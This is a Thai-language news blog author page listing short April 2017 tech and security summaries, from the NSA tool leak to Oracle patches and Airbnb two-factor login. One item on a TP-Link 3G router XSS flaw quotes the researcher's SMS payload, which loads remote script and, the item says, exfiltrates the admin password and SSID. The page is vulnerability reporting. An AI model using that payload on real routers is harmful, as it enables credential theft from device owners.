lew | Blognone

Member for : Thu, 11/08/2005 - 11:15

ชุดแฮกหลุดจาก NSA เริ่มอาละวาดหลังกลุ่มแฮกเกอร์แจกเครื่องมือทั้งหมด เซิร์ฟเวอร์วินโดวส์ติดนับหมื่นเครื่อง

By lew

on 24 April 2017 - 13:26 Tag: NSA, Windows, Security

NSA

กลุ่มแฮกเกอร์ Shadow Broker เคยออกมาขอเงิน 1 ล้านดอลลาร์เพื่อแลกกับชุดเครื่องมือที่น่าจะเป็นของ NSA แต่ปรากฎว่าไม่มีใครยอมจ่ายทำให้ทางกลุ่มปล่อยเครื่องมือออกมาฟรี และตอนนี้ก็เริ่มมีแฮกเกอร์ใช้เครื่องมือเหล่านี้แฮกเครื่องที่ต่ออินเทอร์เน็ตเป็นวงกว้างแล้ว

ธนาคารในบราซิลถูกขโมยโดเมน 5 ชั่วโมง หน้าเว็บถูกปลอมเอารหัสลูกค้า, ติดตั้งมัลแวร์

By lew

on 23 April 2017 - 14:06 Tag: Brazil, Banking, Security

Brazil

การโจมตีธนาคารด้วยการปลอมโดเมนเพื่อหลอกให้ลูกค้าใส่รหัสผ่านคงเป็นเรื่องที่เราพบเจอกันเรื่อยๆ ที่งาน Kaspersky Security Summit ทาง Kaspersky ก็รายงานถึงธนาคารแห่งหนึ่งในบราซิลที่ถูกขโมยโดเมนจริงของธนาคารไปถึง 5 ชั่วโมง ในช่วงวันที่ 22 ตุลาคมปีที่แล้ว

รายงานไม่ระบุชื่อธนาคารแต่ระบุว่าเป็นธนาคารขนาดใหญ่ มีทรัพย์สินรวม 25,000 ล้านดอลลาร์สหรัฐฯ, ลูกค้ากว่า 5 ล้านคน, และจำนวนสาขา 500 สาขา

[ไม่ยืนยัน] Mi MIX 2 โผล่ให้สั่งจองล่วงหน้า หน้าจอ 6.4 นิ้ว, แรม 8GB

By lew

on 21 April 2017 - 22:30 Tag: Xiaomi

Xiaomi

เมื่อวานนี้ Xiaomi เปิดตัว Mi 6 วันนี้ปรากฎว่ามีการประกาศสั่งจอง Mi MIX 2 ใน Gearbest แม้จะลบออกไปแล้วแต่หน้าสั่งจองก็มีภาพพร้อมสเปคอย่างละเอียด

กรณีนี้ตัวร้านที่เปิดรับจองอาจจะสร้างข้อมูลปลอมขึ้นมาเอง หรือเป็นภาพหลุดก่อนการเปิดตัวจริงๆ ก็เป็นไปได้ อย่างไรก็ตามสเปคที่เปิดออกมามีดังนี้

ออราเคิลปล่อยแพตช์ความปลอดภัยไตรมาสที่สอง รวม 299 ช่องโหว่

By lew

on 21 April 2017 - 21:51 Tag: Oracle, Security, Enterprise

Oracle

ออราเคิลปล่อยแพตช์ประจำไตรมาสที่สองของปี ตามนโยบายการออกแพตช์ปีละสี่รอบของบริษัท โดยรอบนี้มีช่องโหว่ได้รับการแก้ไขรวม 299 รายการ กระจายไปตามรายการซอฟต์แวร์ต่างๆ แต่รายการช่องโหว่ระดับวิกฤติ มักมาจากช่องโหว่ของ Struts 2 หลายสิบรายการ

สำหรับช่องโหว่จาวาที่ร้ายแรงที่สุดเป็น CVE-2017-3512 และ CVE-2017-3514 ในส่วน AWT, ส่วน Solaris มีช่องโหว่ระบบร้ายแรงสูงสุด 1 รายการในส่วน Kernel RPC

MySQL นั้นตัวเซิร์ฟเวอร์มีช่องโหว่คะแนน CVSS สูงสุดที่ 7.7 แต่สำหรับคนใช้รุ่น Enterprise อาจจะต้องระวังกว่าเพราะตัว Monitoring ได้รับผลกระทบจาก Struts 2 ทำให้มีช่องโหว่คะแนน 10.0 อีกหนึ่งรายการ

ไมโครซอฟท์ปล่อย SQL Server 2017 CTP 2.0: ปรับแต่งประสิทธิภาพการคิวรีอัตโนมัติ, รองรับภาษา Python

By lew

on 21 April 2017 - 21:00 Tag: Database, Microsoft, SQL Server

Database

ไมโครซอฟท์ประกาศปล่อย SQL Server 2017 Community Technology Preview 2.0 ให้นักพัฒนาได้ลองใช้งานกันก่อน โดยเพิ่มฟีเจอร์หลักสองอย่างได้แก่การปรับปรุงการคิวรี และการรองรับภาษา Python ในการวิเคราะห์ข้อมูล

ฟีเจอร์ Adaptive Query Processing จะเพิ่มไว้ใน SQL Server 2017 แต่ในเวอร์ชั่น CTP 2.0 ก็เพิ่มฟีเจอร์ย่อยเพื่อให้ปรับปรุงประสิทธิภาพได้เองเพิ่มขึ้นในบางกรณี

อีกฟีเจอร์สำคัญคือการรองรับภาษา Python ได้ในตัว โดยสามารถฝังไปกับ T-SQL เพื่อแปลงข้อมูลและประมวลผลได้เลย นอกจากนี้ไมโครซอฟท์ยังใส่ฟังก์ชั่นการประมวลผลแบบขนานให้เรียกใช้จากโค้ด Python ได้อีกด้วย

MIT แบ่งไอพี 18.0.0.0/8 ออกขาย เงินที่ได้สนับสนุนค่าอัพเกรดเน็ตเวิร์คมหาวิทยาลัย

By lew

on 21 April 2017 - 00:30 Tag: MIT, IPv4, Internet

MIT

อินเทอร์เน็ตยุคแรกๆ มีการแจกจ่ายไอพีกันค่อนข้างง่ายดาย บริษัทที่ร่วมทดสอบไอพีมักได้วง /8 หรือ /16กันได้โดยง่าย แต่เมื่อการเปลี่ยนไปยัง IPv6 ไม่สามารถทำได้รวดเร็วอย่างที่หวังกันไว้ ตอนนี้ไอพีก็กลายเป็นของมีค่า ทำให้ MIT ตัดสินใจตัดแบ่งไอพีวง 18.0.0.0/8 ออกขายแล้ว

Alipay บุกเอเชียตะวันออกเฉียงใต้ ซื้อ helloPay เปิดตัวในสิงคโปร์, มาเลเซีย, อินโดนีเซีย, ฟิลิปปินส์

By lew

on 20 April 2017 - 17:26 Tag: Alipay, Alibaba, Southeast Asia

Alipay

Ant Financial เจ้าของแอป Alipay ประกาศเข้าซื้อ helloPay Group จาก Lazada แล้วเปลี่ยนชื่อบริการเป็น Alipay เตรียมให้บริการจ่ายเงินในเอเชียตะวันออกเฉียงใต้

ประเทศที่มีแอป Alipay ได้แก่ สิงคโปร์, มาเลเซีย, อินโดนีเซีย, และฟิลิปปินส์ โดยแอปของแต่ละชาติยังมีพื้นที่ใช้งานจำกัด ตอนนี้ใช้ได้เฉพาะบนเว็บ Lazada ในแต่ละประเทศเท่านั้น และไม่สามารถจ่ายกับร้านค้าที่รับเงินจาก Alipay ปกติได้

ตัว helloPay เดิมเป็นบริการรับจ่ายเงินให้กับเว็บ Lazada แต่ละประเทศรวมถึงประเทศไทย และแต่เดิมไม่มีแอป แต่หลังจาก Ant เข้าซื้อไปแล้วก็เตรียมจะเปิดบริการแยกออกมา

ประชาธิปไตยอยู่ในใจแถมได้ลุ้น กลุ่มสนับสนุนเลือกตั้งเกาหลีจัดหวยเลือกตั้ง ผู้ลงคะแนนลุ้นรางวัล 150,000 บาท

By lew

on 20 April 2017 - 14:06 Tag: South Korea, Politics

South Korea

ประชาธิปไตยอาจจะอยู่ในใจทุกคน แต่สำหรับเกาหลีที่กำลังมีเลือกตั้งประธานาธิบดีวันที่ 9 พฤษภาคมนี้ ผู้ลงคะแนนเสียงอาจจะได้มีส่วนร่วมมากกว่าประชาธิปไตยตามปกติ เมื่อกลุ่มสนับสนุนการเลือกตั้งเกาหลีจัด "หวยเลือกตั้ง" จับรางวัลสำหรับผู้ลงคะแนนเสียง

กลุ่มนี้นำโดย Yoon Byung-joo นักพัฒนาเว็บที่ทำงานสตาร์ตอัพในเกาหลีอยู่แล้ว และมองว่ากลุ่มคนรอบตัวไม่สนใจการเมืองนัก จึงรวมกลุ่มมาสนับสนุน "การสร้างสรรค์สังคมให้ดีขึ้น"

ผู้ที่ลงคะแนนเสียงในเกาหลีจะถูกปั๊มมือยืนยันการลงคะแนนเสียง ทางกลุ่ม Vote for Korea อาศัยภาพมือที่มีรอยปั๊มแล้วลงทะเบียนผู้ลงคะแนนเพื่อจับรางวัล

Mastercard ทดสอบบัตรเครดิตรุ่นใหม่ ตรวจลายนิ้วมือผู้ใช้ได้จากตัวบัตร

By lew

on 20 April 2017 - 11:19 Tag: Mastercard, Payment

Mastercard

Mastercard เปิดตัวบัตรเครดิตมีเซ็นเซอร์ลายนิ้วมือในตัว โดยยังใช้งานร่วมกับเครื่องรับบัตร EMV ทั่วโลกได้ โดยการใช้งานบัตรยังคงเหมือนเดิม แต่ระหว่างที่เสียบบัตรเข้าเครื่องรับจ่าย นิ้วมือเจ้าของบัตรจะต้องแตะอยู่ที่เซ็นเซอร์ลายนิ้วมือเพื่อยืนยันการจ่าย

แม้ว่าเทคโนโลยีนี้จะไม่ต้องเปลี่ยนแปลงเครื่องรับจ่ายแต่อย่างใด แต่ตอนนี้การทดลองก็ยังจำกัดอยู่ในซุปเปอร์มาร์เก็ต Pick n Pay และธนาคาร Absa ในเครือ Barclays Africa

ทาง Mastercard ระบุว่าเตรียมขยายการทดสอบไปยังยุโรปและเอเชียแปซิฟิกในไม่กี่เดือนข้างหน้า

Docker เปิดโครงการ Moby ชุดสร้างระบบสำหรับรันคอนเทนเนอร์, LinuxKit ชุดสร้างลินุกซ์ขนาดเล็ก

By lew

on 19 April 2017 - 23:32 Tag: Open Source, Docker

Open Source

Docker เปิดตัวสองโครงการย่อยสำหรับการสร้างลินุกซ์ขนาดเล็ก โครงการแรกคือ Moby ชุดสร้างระบบคอนเทนเนอร์สำหรับผู้ที่อยากปรับแต่งซอฟต์แวร์รันคอนเทนเนอร์ให้มีความสามารถเพิ่มเติม และ LinuxKit ชุดสร้างลินุกซ์สำหรับการรันคอนเทนเนอร์

ทาง Docker จะค่อยๆ แตกส่วนต่างๆ ของ Docker ทุกวันนี้ออกมาเป็นชิ้นๆ อยู่ใน Moby พร้อมกับเครื่องมือสำหรับการสร้างซอฟต์แวร์ส่วนต่างๆ ของ Docker โดยการดูแลโครงการจะคล้ายกับ Fedora ที่ดูแลกันเองโดยชุมชน ขณะเดียวกันก็ทำหน้าที่เป็นโครงการต้นทางให้กับ RedHat

มุ่งสู่คอนเทนเนอร์ Oracle นำซอฟต์แวร์หลักขึ้น Docker Store

By lew

on 19 April 2017 - 22:41 Tag: Oracle, Docker

Oracle

งาน DockerCon ปีนี้ ออราเคิลประกาศนำซอฟต์แวร์หลักๆ เช่น Oracle Database, Oracle MySQL, Java 8 SE, WebLogic, Oracle Coherence, และ Oracle Instant Client ขึ้น Docker Store ทั้งหมด

อิมเมจเหล่านี้เปิดให้นักพัฒนาใช้งานได้ฟรีสำหรับนักพัฒนา สำหรับนักพัฒนาที่อยากทดสอบซอฟต์แวร์ร่วมกับระบบฐานข้อมูลของออราเคิลต่อจากนี้ก็แค่ pull อิมเมจเหล่านี้มาใช้งานกันได้เลย

Starcraft 1.18 แจกฟรีแล้ว ดาวน์โหลดได้ทั้งพีซีและแมค

By lew

on 19 April 2017 - 11:24 Tag: Games, StarCraft

Games

หลังจากเมื่อต้นปี Blizzard แจก Starcraft II โดยไม่ระบุเงื่อนไขว่าทำอย่างไรจึงได้รับ ตอนนี้ Starcraft ภาคแรกก็แจกฟรีทั้งหมดแล้ว

แพตช์ล่าสุดยังเพิ่มฟีเจอร์หลายอย่าง ตั้งแต่การรองรับ Windows 10, สามารถปรับเล่นได้ทั้งโหมดเต็มจอหรือเป็นวินโดวส์, โหมดสังเกตการณ์ดูเกมของคนอื่น

Chrome จะไม่แสดงโดเมนที่มีตัวอักษรที่คล้ายตัวละติน แก้ปัญหา phishing

By lew

on 19 April 2017 - 11:01 Tag: Chrome, Google, Phishing, Security

Chrome

การเปิดใช้งานตัวอักษร unicode ในโดเมนเปิดทางให้การโจมตี phishing ทำได้แนบเนียนขึ้นเรื่อยๆ ปัญหาสำคัญเช่น อักษรซีริลลิก (Cyrillic) ที่มีตัวอักษรเหมือนกับตัวละตินในภาษาอังกฤษหลายตัว ทำให้สามารถปลอมโดเมนได้อย่างแนบเนียน

Xudong Zheng รายงานปัญหานี้ตั้งแต่สัปดาห์ที่แล้ว ระบุว่าบนเครื่องบางเครื่องที่ฟอนต์ตรงกัน การปลอมโดเมนด้วยอักษรซีริลลิก ทำให้ผู้ใช้ไม่สามารถแยกระหว่างโดเมนจริงกับโดเมนปลอมได้เลย

Magento มีช่องโหว่รันโค้ดจากภายนอก เวอร์ชั่นล่าสุดยังไม่แก้ไข

By lew

on 18 April 2017 - 08:20 Tag: Magento, Security

Magento

Defense Code รายงานช่องโหว่ของระบบอีคอมเมิร์ช Magento ที่ได้รับความนิยมเป็นอย่างสูงรวมถึงในบ้านเราเอง โดยระบบพรีวิววิดีโอจาก Vimeo จะดาวน์โหลดภาพสินค้าตัวอย่างเสมอ และแม้ว่าตัวซอฟต์แวร์จะตรวจสอบไฟล์ที่กำลังดาวน์โหลดว่าเป็นภาพจริงหรือไม่ แต่ก็ดาวน์โหลดไฟล์เสมอแม้จะผิดพลาดก็ตามทำให้แฮกเกอร์ทำโค้ดไปวางบนเซิร์ฟเวอร์ของเหยื่อได้

Airbnb เปิดใช้การยืนยันตัวตนหลายขั้นตอนแล้ว, ส่ง SMS ให้ตอนใช้เครื่องใหม่ครั้งแรก

By lew

on 17 April 2017 - 19:25 Tag: Airbnb, Security

Airbnb

Airbnb เจอปัญหาผู้ใช้ถูกขโมยบัญชีมากขึ้นเรื่อยๆ ในช่วงหลัง หลังจากที่พยายามทำระบบตรวจจับความเสี่ยงภายใน ตอนนี้ทาง Airbnb ก็หันมาใช้การยืนยันตัวตนหลายขั้นตอนด้วย SMS แล้ว

การส่ง SMS ของ Airbnb จะไม่ส่งบ่อยๆ เหมือนการทำธุรกรรมธนาคารที่เราพบกัน แต่จะจำไว้ว่าเราเคยใช้อุปกรณ์ใดล็อกอินเข้าแอปบ้าง หากเป็นอุปกรณ์ใหม่ก็จะส่งรหัสทาง SMS หรืออีเมล หลังจากนั้นจะสามารถล็อกอินด้วยอุปกรณ์เดิมต่อไปได้เรื่อยๆ

ที่มา - Airbnb

FBI มีไคลเอนต์ BitTorrent เฉพาะสำหรับตามจับคนแชร์ภาพโป๊เด็ก

By lew

on 17 April 2017 - 18:56 Tag: FBI, BitTorrent

FBI

FBI มีเทคโนโลยีเฉพาะของตัวเองสำหรับตามจับคนร้ายเสมอๆ วันนี้ทาง TorrentFreak ก็รายงานถึงความสามารถของ FBI ในการตามจับคนร้ายคดีเผยแพร่ภาพอนาจารเด็ก ที่ใช้ไคลเอนต์ BitTorrent ที่ปรับแต่งมาเป็นพิเศษเพื่อการตามจับคนร้าย

ไคลเอนต์รุ่นพิเศษนี้จะใช้สำหรับเก็บข้อมูลไอพีที่ได้มาจาก tracker จากนั้นเมื่อ FBI ล็อกเป้าหมาย ก็สามารถดาวน์โหลดไฟล์ทั้งหมดจากคนแชร์รายเดียว เพื่อยืนยันว่าต้นทางมีไฟล์ครบทั้งไฟล์อยู่บนเครื่องจริงๆ เพื่อดำเนินคดีต่อไป

นักวิจัยรายงานช่องโหว่ 3G Router, ดึงรหัสแอดมินได้ผ่าน SMS

By lew

on 17 April 2017 - 13:36 Tag: Security, TP-Link

Security

Jan Hörsch จากบริษัท Securai รายงานช่องโหว่ของเราท์เตอร์ 3G ของ TP-Link รุ่น M5350 ที่มีช่องโหว่ cross-site scripting (XSS) เปิดทางให้แฮกเกอร์สามารถยิงโค้ดจาวาสคริปต์ขึ้นไปรันได้

นักวิจัยทดสอบด้วยการยิง SMS <script src=//n.ms/a.j></script> เพื่อให้เราท์เตอร์นำโค้ดขึ้นไปรัน จากนั้นตัวสตริปต์จะส่ง SMS กลับมาเป็นรหัสผ่านและ SSID ของตัวเราท์เตอร์

HPE เปิดตัว HPE SecureData with Hyper FPE ชุดเข้ารหัสรักษาฟอร์แมตข้อมูล ที่ได้รับการรับรองจาก NIST เป็นรายแรก

By lew

on 17 April 2017 - 11:57 Tag: HPE, Security, NIST, Cryptography

HPE

NIST เปิดตัวมาตรการการเข้ารหัสแบบรักษาฟอร์แมตข้อมูล (Format-Preserving Encryption - FPE) มาตั้งแต่ปีที่แล้ว ตอนนี้ทาง HPE ประกาศว่าโซลูชั่น SecureData ของบริษัทเป็นโซลูชั่นแรกที่ได้รับการรับรอง (validated) ตามมาตรฐานนี้

HPE SecureData with Hyper FPE ใช้กระบวนวิธีเข้ารหัสแบบ AES-FF1 เป็นหนึ่งในสามกระบวนวิธีที่มาตรฐานของ NIST รับรองให้ใช้งาน

สิงคโปร์ประกาศโครงการเมกเกอร์ระดับชาติ เตรียมใช้ micro:bit ในโรงเรียน

By lew

on 16 April 2017 - 08:54 Tag: Maker Movement, Singapore, Education

Maker Movement

Yaacob Ibrahim รัฐมนตรีกระทรวงการสื่อสารและสารสนเทศของสิงคโปร์ประกาศโครงการสนับสนุนเมกเกอร์ระดับชาติในชื่อ Digital Maker Programme สนับสนุนตั้งแต่การศึกษา, ชุมชนเมกเกอร์, ไปจนถึงตลาดสินค้าสิ่งประดิษฐ์

โครงการที่เป็นรูปธรรมส่วนแรกคือการร่วมมือกับกระทรวงศึกษา นำบอร์ด micro:bit ที่ BBC เคยแจกให้นักเรียนในโรงเรียนอังกฤษมาใช้ในการเรียน โดยมุ่งจะใช้งานในโรงเรียนประถมและมัธยม ระยะเวลาโครงการสองปี ส่วนการสนับสนุนในแง่ชุมชนจะมีการจัดฝึกความรู้เกี่ยวกับเมกเกอร์ให้ และระดับธุรกิจจะมีการสนับสนุนด้านการเงินให้กับบริษัทต่อไป

ซอฟต์แวร์ควบคุมการบินสนามบินฮ่องกงช่องเซฟเต็ม ระบบล่ม ต้องใช้ระบบสำรอง

By lew

on 15 April 2017 - 22:54 Tag: Hong Kong, Software

Hong Kong

ในเกมเรามักเห็นระบบเซฟเกมแบบ "ช่องเซฟ" ที่เกมหนึ่งๆ จะเซฟได้ไม่เกิน 10 จุดเท่านั้น แต่ซอฟต์แวร์สนามบินฮ่องกงกลับมีข้อจำกัดแบบเดียวกัน และการเซฟเกินช่องเซฟมีผลถึงกับทำระบบล่มได้

ระบบควบคุมการบินของสนามบินฮ่องกงออกแบบให้มีช่องเซฟการตั้งค่าหน้าจอ (ขนาดตัวอักษร, ความสว่างหน้าจอ ฯลฯ) รวมทั้งหมด 5,500 ช่อง โดยมีผู้ใช้ระบบรวมประมาณ 400 คน แต่เมื่อวันที่ 8 เมษายนที่ผ่านมาผู้ใช้เซฟการตั้งค่าชุดใหม่เข้าระบบเกินข้อจำกัดพอดี ทำให้ระบบผิดพลาดเข้าสู่โหมดเตือนความผิดปกติและย้ายงานไปยังเซิร์ฟเวอร์ตัวที่สอง